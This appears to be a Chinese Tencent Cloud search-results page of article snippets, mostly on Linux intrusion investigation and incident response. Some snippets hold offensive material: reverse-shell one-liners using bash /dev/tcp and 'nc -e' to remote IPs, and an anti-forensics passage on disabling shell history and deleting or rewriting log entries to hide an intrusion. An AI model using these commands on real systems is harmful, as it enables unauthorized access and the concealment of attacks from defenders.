首页
学习
活动
专区
工具
TVP
发布
精选内容/技术社群/优惠产品,尽在小程序
立即前往

Linux入侵排查时安全工具整理

Linux入侵排查时安全工具整理 近期有协助网友排查一次Linux云主机中了挖矿病毒的情况: ?...6、《Linux应急响应之工具篇》 https://cloud.tencent.com/developer/article/1449023 当然应对Linux入侵时我们也可以使用一些自动化的安全工具协助排查溯源...CentOS7下使用开源安全审计工具Lynis 下面介绍近期我所接触过的几款Linux安全工具 1、GScan GScan程序旨在为安全应急响应人员对Linux主机排查时提供便利,实现主机侧Checklist...(图片可放大查看) 2、rkhunter 1)rkhunter简介 rkhunter也叫”Rootkit猎手”, rkhunter是Linux系统平台下的一款开源入侵检测工具,具有非常全面的扫描范围,...rootkit是Linux平台下最常见的一种木马后门工具,它主要通过替换系统文件来达到入侵和和隐蔽的目的,这种木马比普通木马后门更加危险和隐蔽,普通的检测工具和检查手段很难发现这种木马。

3.4K42
  • 您找到你想要的搜索结果了吗?
    是的
    没有找到

    Linux入侵小结

    0x00 审计命令 在linux中有5个用于审计的命令: last:这个命令可用于查看我们系统的成功登录、关机、重启等情况;这个命令就是将/var/log/wtmp文件格式化输出。...last -x reboot 只针对登录 使用-d参数,并且参数后不用跟任何选项 last -d 显示错误的登录信息 lastb 查看当前登录情况 who、w 0x01 日志查看 在Linux...(utmp、wtmp日志文件是多数Linux日志子系统的关键,它保存了用户登录进入和退出的记录。...0x02 用户查看 Linux不同的用户,有不同的操作权限,但是所有用户都会在/etc/passwd /etc/shadow /etc/group /etc/group- 文件中记录; 查看详细 注:linux...*:查看cron文件是变化的详细 ls /var/spool/cron/ 检查后门 对于linux的后门检查,网络上有一些公开的工具,但是在不使用这些工具的前提时,我们可以通过一些命令来获取一些信息。

    2K20

    Linux入侵 反弹shell

    二.命令 Bash反弹shell的实现: bash -i >& /dev/tcp/10.0.0.1/8080 0>&1 看到这短短的一行代码,正在复习Linux,自我感觉良好的我顿时充满了挫败感,这都是些什么鬼.../dev/tcp/是Linux中的一个特殊设备,打开这个文件就相当于发出了一个socket调用,建立一个socket连接,读写这个文件就相当于在这个socket连接中传输数据。...同理,Linux中还存在/dev/udp/。 要想了解“>&”和“0>&1”,首先我们要先了解一下Linux文件描述符和重定向。 linux shell下常用的文件描述符是: 1....三.NetCat 如果目标主机支持“-e”选项的话,我们就可以直接用 nc -e /bin/bash 10.42.0.1 1234 但当不支持时,我们就要用到Linux神奇的管道了。

    6.2K30

    黑客公布入侵汽车工具

    在美国DEFCON21上,两名研究员黑客公布了他们之前研究的能够入侵丰田普锐斯和福特翼虎的工具,这两名研究员分别是Charlie Miller和Chris Valasek。...所以,他们公布的信息无法用于远程入侵汽车网络,而这才是在现实世界中真正发起攻击的主要方式。他们希望自己公布的数据能够鼓励其他白帽黑客继续寻找汽车的更多安全漏洞,并修复这些漏洞。...米勒说,他目前在Twitter担任安全工程师,以研究苹果(440.99,2.49,0.57%)公司App Store的入侵方式而著称。...现在大多数汽车的ECU能够控制汽车大多数功能,比如加速、制动、转向、显示屏和喇叭,Charlie Miller和Chris Valasek发布的工具包里面包含一个EcomCat的python脚本,可以读取和写入汽车的

    66950

    Linux手工入侵排查思路

    Linux主机发生安全事件需要进行入侵排查时,一般可以使用常见的shell命令,通过分析主机的异常现象、进程端口、启动方式、可疑文件和日志记录等信息以确认主机是否被入侵。...在这里,结合工作中Linux安全事件分析处理办法,总结了Linux手工入侵排查过程中的分析方法。...---- 01、检查系统账号 从攻击者的角度来说,入侵者在入侵成功后,往往会留下后门以便再次访问被入侵的系统,而创建系统账号是一种比较常见的后门方式。...在做入侵排查的时候,用户配置文件/etc/passwd和密码配置文件/etc/shadow是需要去重点关注的地方。...可以通过下述方式查看开机自启的服务: systemctl list-unit-files --type=service | grep "enabled" (2)chkconfig就是CentOS6以前用来控制系统服务的工具

    1.6K40

    Linux 入侵痕迹清理技巧

    在攻击结束后,如何不留痕迹的清除日志和操作记录,以掩盖入侵踪迹,这其实是一个细致的技术活。你所做的每一个操作,都要被抹掉;你所上传的工具,都应该被安全地删掉。...HISTZONE HISTORY HISTLOG; export HISTFILE=/dev/null; export HISTSIZE=0; export HISTFILESIZE=0 02、清除系统日志痕迹 Linux...'/自己的ip/'d /var/log/messages # 全局替换登录IP地址: sed -i 's/192.168.166.85/192.168.1.1/g' secure 03、清除web入侵痕迹...access.log | grep -v evil.php > tmp.log # 把修改过的日志覆盖到原日志文件 cat tmp.log > /var/log/nginx/access.log/ 04、文件安全删除工具...wipe filename (4)Secure-Delete Secure-Delete 是一组工具集合,提供srm、smem、sfill、sswap,4个安全删除文件的命令行工具

    3.7K30

    Kali Linux 入侵渗透 检测 (一)

    且XProbe是一款远程主机操作系统探查工具。开发者基于和Nmap相同的一些技术(same techniques),并加入了自己的创新。Xprobe通过ICMP协议来获得指纹。...MaItego 就是这样一款优秀而强大的工具。MaItego 允许从服务器中更新,整合数据,并允许用户很大程度上的的自定义,从而实现整合出最适合用户的“情报拓扑”。 怎么去利用它呢?...W3AF W3af 是web 代码审计和应用程序渗透测试工具。它分很多个模块,如攻击,审计,开发,暴力解析。...Zed Attack Proxy简写为ZAP,是一个简单易用的渗透测试工具,是发现web应用中的漏洞的利器,更是渗透测试爱好者的好东西。...(只是一个看网站目录结构的一个工具,可以根据结构看是个什么站,DZ什么的具体我就不介绍了)

    2.8K10

    【应急响应】Linux入侵排查思路

    0x00 前言 当企业发生黑客入侵、系统崩溃或其它影响业务正常运行的安全事件时,急需第一时间进行处理,使企业的网络信息系统在最短时间内恢复正常工作,进一步查找入侵来源,还原入侵事故过程...针对常见的攻击事件,结合工作中应急响应事件分析和解决的方法,总结了一些Linux服务器入侵排查的思路。...这个日志文件中会记录Linux系统的绝大多数重要信息,如果系统出现问题时,首先要检查的就应该是这个日志文件 /var/log/btmp 记录错误登录日志,这个文件是二进制文件,不能直接vi查看,而要使用...localhost sudo: good : TTY=pts/4 ; PWD=/home/good ; USER=root ; COMMAND=/sbin/shutdown -r now 0x03 工具篇...版: 河马webshell查杀:http://www.shellpub.com 深信服Webshell网站后门检测工具:http://edr.sangfor.com.cn/backdoor_detection.html

    2.6K31

    linux检测系统是否被入侵(上)

    入侵者在入侵成功后,往往会留下后门以便再次访问被入侵的系统,而创建系统账号是一种比较常见的后门方式。...在做入侵排查的时候,用户配置文件/etc/passwd和密码配置文件/etc/shadow是需要去重点关注的地方。...strings -f /proc/$PID/environ | cut -f2 -d '' #查看该进程启动时的完整环境变量: > lsof -p $PID #列出该进程所打开的所有文件 检查系统服务 Linux...可以通过下述方式查看开机自启的服务 > systemctl list-unit-files --type=service | grep "enabled" //chkconfig就是CentOS6以前用来控制系统服务的工具...> cat /etc/rc.local 检查计划任务 利用计划任务进行权限维持,可作为一种持久性机制被入侵者利用。检查异常的计划任务,需要重点关注以下目录中是否存在恶意脚本。

    3.8K20
    领券